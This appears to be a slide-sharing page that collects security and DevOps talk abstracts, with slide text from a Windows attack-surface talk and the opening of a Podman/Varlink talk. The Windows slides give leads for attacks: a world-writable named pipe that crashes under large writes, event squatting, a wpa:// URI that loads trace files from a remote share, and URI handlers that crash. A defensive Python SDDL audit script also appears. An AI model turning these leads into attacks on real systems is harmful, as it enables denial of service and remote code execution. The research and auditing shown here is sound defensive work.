With the 'rise of containers' comes also the rise of container platforms. And while Docker is the way to do things for now, Podman has also been gaining traction as the new kid on the block, especially after being somewhat embraced by Red Hat and Fedora. Being new also means a lack of heavy scrutiny and audit on the security side of things. Once you start integrating other protocols and pieces that complement each other, such as Varlink, boundaries become fuzzy. Rather than focus on container breakouts, which are also very important, we'll focus on how Podman and Varlink interoperate and the authentication and security implications of that. We'll look at the remote API capabilities, secure configurations and how certain setups and projects out there can be vulnerable to compromise by default. By the end of the talk, we will have discussed various bugs, issues and hardening techniques around deploying Podman and Varlink together, and if you don't know a lot about containers, you'll learn a bit along the way.
Kubernetes Story - Day 1: Build and Manage Containers with Podman - Mihai Criveti
OpenShift Workshop Day 1: https://www.youtube.com/watch?v=3IuaZu8-fsY - Build and Manage Containers with Podman
In this workshop you'll learn how to build and manage containers, publish images to Quay, then install and deploy containers onto OpenShift.
How to Improve Your Image Builds Using Advance Docker Build - Docker, Inc.
Nicholas Dille, Haufe-Lexware + Docker Captain -
Docker continues to be the standard tool for building container images. For more than a year Docker has shipped with BuildKit as an alternative image builder, providing advanced features for secret and cache management. These features help to make image builds faster and more secure. In this session, Docker Captain Nicholas Dille will teach you how to use BuildKit features to your advantage.
DMM provides one of the largest video streaming services in Japan.
Responding to diversifying needs and demands for higher quality has recently become urgent, so we are working on renewing our video delivery platform. To split the monolithic system into microservices, we use Ruby on Rails, AngularJS and Go. In this session we explain their architecture and development flow in an easy-to-understand way.
DevOps Masters Program: https://www.edureka.co/masters-program/devops-engineer-training
This DevOps Docker Commands tutorial (Docker Tutorial Blog Series: https://goo.gl/z93Ed1) will introduce you to the most commonly used Docker commands. The hands-on session is performed on a 64-bit Ubuntu machine on which Docker is installed.
To learn how Docker can be used to integrate multiple DevOps tools, watch the video titled 'DevOps Tools', by clicking this link: https://goo.gl/up9iwd
A Gentle Introduction To Docker And All Things Containers - Jérôme Petazzoni
Docker is a runtime for Linux Containers. It enables "separation of concern" between devs and ops, and solves the "matrix from hell" of software deployment. This presentation explains it all! It also explains the role of the storage backend and compares the various backends available. It gives multiple recipes to build Docker images, including integration with configuration management software like Chef, Puppet, Salt, Ansible. If you already watched other Docker presentations, this is an actualized version (as of mid-November 2013) of the thing!
When you are designing a production environment, security is essential. The whole Docker ecosystem, but in particular Docker Swarm, allows us to ship our containers off our laptop; how can we make this process safe? During my talk, I will share tips around the production environment, immutability and how to troubleshoot common attacks such as code injection with Docker, plus static analysis of our images and content trust with Notary to make our journey secure.
How can we set up a cluster on the main cloud providers with VPN and node labeling to expose only a portion of our cluster? I will also show what Docker provides (Content Trust, Static Analysis) but also open source alternatives such as Notary, centos/clair and Cilium.
By the end of this talk, we will have a better idea of how to manage Docker in production.
Wireless technology is inherently insecure in general, however this presentation details some unconventional attacks that have been around for years but are still incredibly effective. Discussing the basics of AP cloning, abusing captive portals, and more.
The age of IoT is at our threshold. Many large-scale companies have already started developing security solutions to make this brave new world safe. One possible, we may even say surefire, approach is to create a device which would connect to a network and protect the other devices in it. Let’s discuss the efficiency of this approach in relation to BitDefender Box.
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where you have deployed a malware on a user’s workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user’s workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic, meaning that they work against Windows Server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them is endless, e.g., communicating with a bind shell on a webserver behind a restricted DMZ. Beware, live demo and fun included!
Building a production-ready, fully-scalable Docker Swarm using Terraform & Pa... - Outlyer
Bobby is a Consultant DevOps Engineer who currently works with UK Cloud’s clients to help them understand DevOps, how to improve their automation and migrate to a cloud-native environment. Bobby has over twenty years of experience working with the web and has most recently been working with public sector clients on their latest projects.
13 practical tips for writing secure golang applications - Karthik Gaekwad
Writing secure applications in a new language is challenging. Here are some tips to help get you started writing secure code in golang. Presented at LASCON 2015.
Long thought to be relegated to the domain of fast, multithreaded desktop applications, race conditions have made their way into web applications. These bugs are often difficult to test for, and are becoming increasingly prevalent due to faster and faster clients, while server-side languages like Node.js and PHP are struggling to keep up. Race conditions are no longer just bugs: when they are found in critical components of web applications, they become a serious security vulnerability. If the proper checks and defensive measures are not in place, databases get confused, “one-time-use” becomes a relative term, and “limited” becomes “unlimited”. This talk will detail specific examples where malicious users could cause damage or profit from a race-condition flaw in a web application. A custom open-source tool will also be introduced to help security researchers and developers easily check for this class of vulnerability in web applications.
A starter guide to web scraping with Scrapy, one of the best Python modules for web scraping; with Scrapy everything is easier.
This presentation covers the key concepts of Scrapy and the process of creating spiders.
It's the first draft version and there will be other versions until the final one; if you see something that you want to be improved, give feedback and I will take that into consideration.
I also talk about some alternatives to Scrapy like lxml, newspaper and others.
At the end I give you access to the code used in this presentation, so you can test the concepts discussed here quickly and easily.
I hope you like it :D
This is the story of our journey from SaltStack to Puppet and beyond. This talk will answer the following questions:
- why we moved from SaltStack
- why Puppet was chosen
- how to use Puppet OpenSource in painless way
- which orchestration tool to use with Puppet
- what is next
DragonCon 2016
Attack surface on Windows is vast and full of opportunities. It has been explored upside down and inside out, although there's always room for other ways to look at it. In this talk, I'll be discussing how to discover attack surface by poking the OS in various ways to reveal interfaces and opportunities often otherwise found by either luck or winning a timing race. Starting a discussion on these components will shake out new bugs or design subtleties as they may have yet to be audited in depth. We'll walk through tooling for both the offensive and defensive angles. I'll be looking at the latest version of Windows 10 and also Server. If you're interested in finding vulnerabilities in the most prevalent platform on earth, or a developer with the urge to know more about application security, this talk is for you and will probably give you some new ideas.
Provoking Windows
For every action, there is a reaction
MSI installer creates many mutexes
Notably one called _MSIExecute
RW Everyone
Commonly checked to ensure only one installation at a time is occurring
Interesting #1
But, everyone can write to \BNO…
Turn on WLAN Autoconfig Service
New pipe with very generous ACEs…
\\.\pipe\WiFiNetworkManagerTask
O:LSG:LSD:(A;;FA;;;WD)(A;;FA;;;CO)(A;;FA;;;IU)(A;;FA;;;RC)(A;;FA;;;BA)
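A practitioner auditing a box for objects like the pipe above wants to turn an SDDL string into a list of "who gets write or full access" findings rather than eyeball it. The following is an added example, not code from the talk: a small SDDL parser plus a check that flags access-allowed ACEs granting modify rights to broad principals (Everyone, Authenticated Users, Interactive Users, Anonymous, Builtin Users). The slide's descriptor is used as input; the "tightened" descriptor is a constructed comparison, not something the talk shows.

```python
import re

# Two-letter SID aliases from the SDDL grammar (subset relevant to this check)
SID_ALIASES = {
    "WD": "Everyone", "AU": "Authenticated Users", "IU": "Interactive Users",
    "AN": "Anonymous", "BU": "Builtin Users", "BA": "Builtin Administrators",
    "SY": "Local System", "LS": "Local Service", "NS": "Network Service",
    "CO": "Creator Owner", "RC": "Restricted Code",
}

# Principals broad enough that write/full access on a shared object deserves review
BROAD_PRINCIPALS = {"WD", "AU", "IU", "AN", "BU"}

# Two-letter rights tokens that let the holder modify the object or its descriptor
WRITE_RIGHTS = {"FA", "GA", "GW", "FW", "WP", "DC", "SD", "WD", "WO"}

# Equivalent bits for ACEs whose rights are written as a raw hex mask (e.g. 0x1f01ff)
WRITE_MASK_BITS = (
    0x10000000   # GENERIC_ALL
    | 0x40000000 # GENERIC_WRITE
    | 0x00000002 # FILE_WRITE_DATA
    | 0x00010000 # DELETE
    | 0x00040000 # WRITE_DAC
    | 0x00080000 # WRITE_OWNER
)

# O:owner G:group D:dacl S:sacl; ACE bodies contain no ':' so lazy [^:] fields are safe
SDDL_RE = re.compile(
    r"^(?:O:(?P<owner>[^:]*?))?(?:G:(?P<group>[^:]*?))?"
    r"(?:D:(?P<dacl>[^:]*?))?(?:S:(?P<sacl>.*))?$"
)
# (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
ACE_RE = re.compile(
    r"\((?P<ace_type>[^;]*);(?P<ace_flags>[^;]*);(?P<rights>[^;]*);"
    r"(?P<object_guid>[^;]*);(?P<inherit_guid>[^;]*);(?P<sid>[^;)]*)\)"
)

# DACL quoted on the slide for \\.\pipe\WiFiNetworkManagerTask
PIPE_SDDL = "O:LSG:LSD:(A;;FA;;;WD)(A;;FA;;;CO)(A;;FA;;;IU)(A;;FA;;;RC)(A;;FA;;;BA)"
# Constructed comparison: only SYSTEM and admins may write, interactive users read only
TIGHT_SDDL = "O:SYG:SYD:(A;;FA;;;SY)(A;;FA;;;BA)(A;;FR;;;IU)"


def split_rights(rights):
    """Rights field -> set of two-letter tokens, or an int if written as a hex mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def parse_sddl(sddl):
    """Split an SDDL string into owner, group, DACL flags and a list of ACE dicts."""
    m = SDDL_RE.match(sddl.strip())
    if not m:
        raise ValueError("not a security descriptor string: %r" % sddl)
    dacl = m.group("dacl") or ""
    aces = []
    for ace in ACE_RE.finditer(dacl):
        fields = ace.groupdict()
        fields["rights"] = split_rights(fields["rights"])
        aces.append(fields)
    return {
        "owner": m.group("owner"),
        "group": m.group("group"),
        "dacl_flags": dacl.split("(", 1)[0],  # e.g. "P", "AI", "PAI" before the first ACE
        "aces": aces,
    }


def grants_write(rights):
    """True if the parsed rights (token set or hex mask) allow modifying the object."""
    if isinstance(rights, int):
        return bool(rights & WRITE_MASK_BITS)
    return bool(rights & WRITE_RIGHTS)


def audit_sddl(sddl):
    """One finding per access-allowed ACE giving a broad principal write/full access."""
    findings = []
    for ace in parse_sddl(sddl)["aces"]:
        if ace["ace_type"] != "A":  # deny, audit and object ACEs do not widen access
            continue
        if ace["sid"] in BROAD_PRINCIPALS and grants_write(ace["rights"]):
            r = ace["rights"]
            findings.append({
                "principal": SID_ALIASES.get(ace["sid"], ace["sid"]),
                "rights": hex(r) if isinstance(r, int) else sorted(r),
            })
    return findings


if __name__ == "__main__":
    for label, sddl in (("slide", PIPE_SDDL), ("tightened", TIGHT_SDDL)):
        print(label, audit_sddl(sddl) or "no broad write access")
```

Run against the slide's descriptor it reports Everyone and Interactive Users with FA; the tightened descriptor produces no findings.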
Interesting #2
We can kill the pipe by looping large Write()s
But what happened?
svchost.exe @ wifinetworkmanager.dll
STATUS_STACK_BUFFER_OVERRUN
wifinetworkmanager.dll!__FatalError(char const *,unsigned long,char const *, …..)
AsyncPipe::ReadCompletedCallback(void)
AsyncPipe::Dispatch(int,void *,void *, …..)
Synchronizer::EnqueueEvent(…..)
\Driver\SoftwareDevice
BUILTIN_DRIVER (???)
SoftwareDevice class per c_swdevice.inf
Doesn’t have .sys loaded, nor many normal things
Exposes many devices during RDP sessions
Some of which are RW everyone
Windows Time
Creates an Event
W32TIME_NAMED_EVENT_SYSTIME_NOT_CORRECT
Squatting on this event produces an exception
svchost.exe @ ntdll.dll (w32time.dll in call stack)
STATUS_STACK_BUFFER_OVERRUN
Not likely a controllable crash, but notable nonetheless
wpa://C:\[trace file path here]/
Launches Windows Performance Analyzer on arbitrary file
Local bugs in WPA file parsing become remote
wpa://\\share\PhotosAppTracing.etl/
.etl, .wpa, .xml, .wpapk, .zip, .cab all fair game
The “crash immediately” club
com.microsoft.builder3d:///
hx-accounts:///
microsoft.windows.photos.crop:///
microsoft.windows.photos.picker:///
ms-wpdrmv:///
ms-apprep:/// (smartscreen)
read:/// (edge)
Tooling
Whale
“What happened at last exec?”
At the end of the day, the ones writing the code also wrote the bugs
No other people put bugs in your code (probably)
Thoughts on Disclosure
There’s no overall good way to disclose
Coordinated Disclosure
Great for vendor, not great for everyone else
Drop bug
Varies depending on your subscribed philosophy
Thinking of fuzzing applications on OS X can quickly lead to a passing conversation of "ooh exotic Mac stuff" or "let's fuzz the kernel", or it can otherwise not be thought of as an exciting target, at least for looking for crashes in stuff other than Safari or the iPhone. While there are some intricacies and nuance involved, workarounds for security protections to enable debugging and finding tools that work and work well, this research will detail how it can be done in a reliable way and make the topic more tangible and easier to digest, kind of like how people think about using AFL on Linux: it "just works". We'll explore some of the overlooked attack surface of file parsers and some network services on Mac, how to fuzz userland binaries and introduce a new fuzzer that makes setup and crash triage straightforward while poking at some Apple core apps and clients. Have you ever thought "This thing has got to have some bugs" but think twice because it's only available on Mac and not worth the effort? If so, you may now find yourself both more motivated and better equipped to do some bug hunting on the sleek and eventually accommodating Mac OS.
Your SSH server configs are secure, right? If you search for hardening SSH, you can read all day about how this or that option is dangerous, or never use that flag, etc. But what really is the risk of compromise? This talk will explore various (mis)configurations and ways to use the client that perhaps have been deemed risky, but also walk through how exactly to attack them to bypass restrictions on the server or even get a shell. We'll also discuss some options that sound really bad, but more nuance is required to fully grasp what it takes to exploit the issue. You might even learn about some new features that let SSH do things you didn't think were really possible, or worst case you'll get a refresher on many attacks that have been mostly forgotten or ignored. Instead of just looking at a config or script and saying "that's bad, shouldn't do that", after this talk you should be able to demo various attacks yourself.
In this talk, we'll break down how one can exploit an ecosystem that enables management, querying, processing, and storage of, yes you guessed it, copious amounts of data. Hadoop and its many friends have been making their way into companies analyzing (sometimes, after massively collecting...) such data for years now, but they also make it easy to find organizations deploying things internally with security either off by default or otherwise exposed to various critical misconfigurations and access control issues.
If you're running engagements, this should also give you a headstart on what to look for, how to attack networks where these products are running along with a few good ways to make them more defendable. Because if you want to defend well, you need to optimize towards mitigating actual risk vs theoretical, and there's no better way to determine if attacks are real than trying them out yourself. Let's say you just want to better understand how to shell out on servers running Apache Cassandra, Drill, Mesos... well, it may add a few pages to your playbook.
(FYI this is the version of the slides without a conference template; hopefully NoConName will share the templated version online as well)
What happens when a company either doesn’t fully empower the Security team, or doesn't have one at all? Stuff like Goto fail, Equifax, unsandboxed AVs and infinite other buzz, or yet to be buzzed, words describe failures of not adequately protecting customers or the services they rely on. Having a solid security team enables a company to set a bar, ensure security exists within the design, insert tooling at various stages of the process and continuously iterate on such results. Working with the folks building the products to give them solutions instead of just problems allows one to scale, earn trust and most importantly be effective and actually ship.
There’s a whole security industry out there with folks wearing every which hat you can think of. They have influence and the ability to find a bug one day and disclose it the next, so companies must adapt both engineering practices and perspectives in order to ‘navigate the waters of reality’ and not just hope nobody takes a look at their product. Having processes in place that reduce attack surface, automate testing and set a minimum bar can reduce bugs, and therefore randomization for devs and the cost of patching, and create a culture where security makes more sense as it demonstrably solves problems.
Nvidia is evolving in this space. Focused on the role of product security, I’ll go through the various components of a security team and how they each interact and complement each other, commodity and niche tooling as well as how relationships across organizations can give one an edge in this area. This talk balances the perspective of security engineers working within a large company with the independent nature of how things work in the industry.
Attendees will walk away with a breadth of knowledge, an inside view of the technical workings, tooling and intricacies of finding and fixing bugs and finding balance within a product-first world.
Microsoft Vulnerability Research - How to be a finder as a vendor - Jeremy Brown
You may think of Microsoft as a company that fixes vulnerabilities, but we frequently find security issues in other vendors’ products as well. Microsoft Vulnerability Research (MSVR) was created to help ensure that our company demonstrates the same behavior, in the role of a finder, that we’d like to see from other companies and researchers from all over the world. We make sure that our reports are complete and accurate and communicated securely and effectively to the right place. This presentation will cover how and why MSVR was created, an in-depth look at our operations and what we’ve learned so far with this program. We’ll also discuss how your company can have a centralized program to do the same. We’ll finish things off with a run through of an example vulnerability that one of our finders discovered, reported through MSVR, and what it was like working to get it fixed with an advisory we released thereafter.
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015 - Jeremy Brown
The web client is critical software to secure from any perspective. No matter if you're an organization or a casual client, you're typically just as vulnerable as anyone else. OSes are often supplemented with hardening toolsets or built-in mitigations as an extra measure to avoid compromise, but as with all things, they aren't completely solid either. Thus the need for systems that break systems, some of which deploy fuzzing and almost all of them work to find implementation bugs. Browser fuzzing has been explored and improved in many different ways over the past several years. In this presentation, we'll be primarily talking about a mutation engine that provides a somewhat novel technique for finding bugs in a still-ripe attack surface: the browser's rendering engine. This technique has the flexibility to be applied even more broadly than browsers, for example, there's initial support for fuzzing PDF readers. We'll also be discussing the tooling and infrastructure areas of the process, detailing what's needed to build a system that will scale and enable your fuzzing strategies to be successful. Finally, we can conclude the talk with some incubation results and how you can start making use of these fuzzing techniques today to find the bugs you need to exploit browsers or identify and fix the code responsible for each vulnerability.
POC Conference 2015
Virtual Appliances have become very prevalent these days as virtualization is ubiquitous and hypervisors commonplace. More and more of the major vendors are providing literally virtual clones for many of their once physical-only products. Like IoT and the CAN bus, it's early in the game and vendors are late as usual. One thing that is catching these vendors off guard is the huge additional attack surface, ripe with vulnerabilities, added in the process. Also, many vendors see software appliances as an opportunity for the customer to easily evaluate the product before buying the physical one, making these editions more accessible and debuggable by utilizing features of the platform on which it runs. During this talk, I will provide real case studies for various vulnerabilities created by mistakes that many of the major players made when shipping their appliances. You'll learn how to find these bugs yourself and how the vendors went about fixing them, if at all. By the end of this talk, you should have a firm grasp of how one goes about getting remote root on appliances.
Your data is much safer at home than it is letting some corporation "take care of it" for you, right? Security reviews for some of the top vendors' devices reveal many interesting findings. Like everything else, there are bugs. But knowing what kinds of bugs and how the vendors have responded will allow you to better understand the impact of plugging these devices into your network. Jeremy will show you just how low access control and least privilege are on their list of priorities. He'll also explore the amount of test collateral and debug interfaces sloppily left shipping to consumers. From remote roots to stealing social network tokens to just plain weird stuff, he'll expand on how it's not just about what they do, but also what they don't do. And, he'll give you some useful guidelines on how to close the gaps yourself.
A Bug Hunter's Perspective on Unix Drivers - Jeremy Brown
The Unix driver space has been understudied with regards to security compared to its vast attack surface. One juicy area that can be especially buggy and accessible in drivers, I/O control, has received much more attention on Windows than on Unix OSes. In this presentation, I will give an introduction to this particular attack surface on Linux, why bugs here are a significant threat and show you how to get started looking for vulnerabilities in drivers on the platform. I’ll also go into some of the tools and techniques available and talk about a new tool I’ve written that can help bug hunters dig into Unix device drivers.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf - Paige Cruz
Monitoring and observability aren’t traditionally found in software curriculums, and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is part of our current company’s observability stack.
While the dev and ops silo continues to crumble, many organizations still relegate monitoring and observability to the purview of ops, infra and SRE teams. This is a mistake: achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party and will share these foundational concepts to build on:
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -... - DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Removing Uninteresting Bytes in Software Fuzzing - Aftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux tools: libxml's xmllint, a tool for parsing XML documents, and binutils' readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format) files. Our preliminary results show that AFL+DIAR not only discovers new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns, and DIAR helps you find such seeds.
- These are the slides of the talk given at the IEEE International Conference on Software Testing, Verification and Validation Workshops, ICSTW 2022.
Pushing the limits of ePRTC: 100ns holdover for 100 days - Adtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024 - Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview, including the concepts of Customer Key and Double Key Encryption.
Transcript: Selling digital books in 2024: Insights from industry leaders - T... - BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ... - James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with traditionally slow and manual security checks, has caused gaps in continuous security as an important piece of the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface of their application supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerabilities and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with a passion for technology and making things work, along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations on CI/CD and application security integrated into the software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do... - UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Welcome to the first live UiPath Community Day Dubai! Join us for this unique occasion to meet our local and global UiPath Community and leaders. You will get a full view of the MEA region's automation landscape and the AI Powered automation technology capabilities of UiPath. Also, hosted by our local partners Marc Ellis, you will enjoy a half-day packed with industry insights and automation peers networking.
📕 Curious on our agenda? Wait no more!
10:00 Welcome note - UiPath Community in Dubai
Lovely Sinha, UiPath Community Chapter Leader, UiPath MVPx3, Hyper-automation Consultant, First Abu Dhabi Bank
10:20 A UiPath cross-region MEA overview
Ashraf El Zarka, VP and Managing Director MEA, UiPath
10:35: Customer Success Journey
Deepthi Deepak, Head of Intelligent Automation CoE, First Abu Dhabi Bank
11:15 The UiPath approach to GenAI with our three principles: improve accuracy, supercharge productivity, and automate more
Boris Krumrey, Global VP, Automation Innovation, UiPath
12:15 To discover how Marc Ellis leverages tech-driven solutions in recruitment and managed services.
Brendan Lingam, Director of Sales and Business Development, Marc Ellis
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™UiPathCommunity
In questo evento online gratuito, organizzato dalla Community Italiana di UiPath, potrai esplorare le nuove funzionalità di Autopilot, il tool che integra l'Intelligenza Artificiale nei processi di sviluppo e utilizzo delle Automazioni.
📕 Vedremo insieme alcuni esempi dell'utilizzo di Autopilot in diversi tool della Suite UiPath:
Autopilot per Studio Web
Autopilot per Studio
Autopilot per Apps
Clipboard AI
GenAI applicata alla Document Understanding
👨🏫👨💻 Speakers:
Stefano Negro, UiPath MVPx3, RPA Tech Lead @ BSP Consultant
Flavio Martinelli, UiPath MVP 2023, Technical Account Manager @UiPath
Andrei Tasca, RPA Solutions Team Lead @NTT Data
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
2. whoami
(No fancy title/bio today)
• ~decade in the industry
• @ Amazon, Microsoft, Nvidia playing offense, defense, whatever … generally trying to be effective across security domains as well as my own fun research
• Prior published research
• Bugs on many different platforms, clients, servers, drivers, virtual appliances, cloud, fuzzing, generally exploring and thinking about how to break and/or fix lots of different stuff, ….
References:
https://packetstormsecurity.com/files/author/6650/
https://www.slideshare.net/JeremyBrown37/presentations
3. whoami
ok ok if you must you can call me uh…
Senior CEO of Independent Research, Manager et al
4. Agenda
I. Podman? Varlink?
II. Local and remote attack surface
III. Some bugs and bad configurations
IV. Exploitation
V. Hardening
VI. Conclusion
“You get on the horn, I throw some peanuts at ‘em and we’ll be in Des Moines in no time….”
Reference: Tommy Boy (movie)
5. What is Varlink?
• Newer IPC protocol, implementation and toolset
• JSON based protocol for exchanging messages
• Meant to be an upgrade over D-Bus, BUS1, custom protocols over unix sockets, etc.
• “plain-text, type-safe, discoverable, self-documenting, remotable, testable, easy to debug… accessible from any programming environment”
• Not much security chatter on it
• But OSS-fuzz seems to have picked it up recently
References
https://varlink.org
https://github.com/systemd/systemd/tree/master/test/fuzz/fuzz-varlink
7. What is Varlink?
• A few different components and deployment scenarios
• Clients and services support for many different languages and system setups
• Can even set up a kernel driver to query via device:/dev/org.kernel….stuff
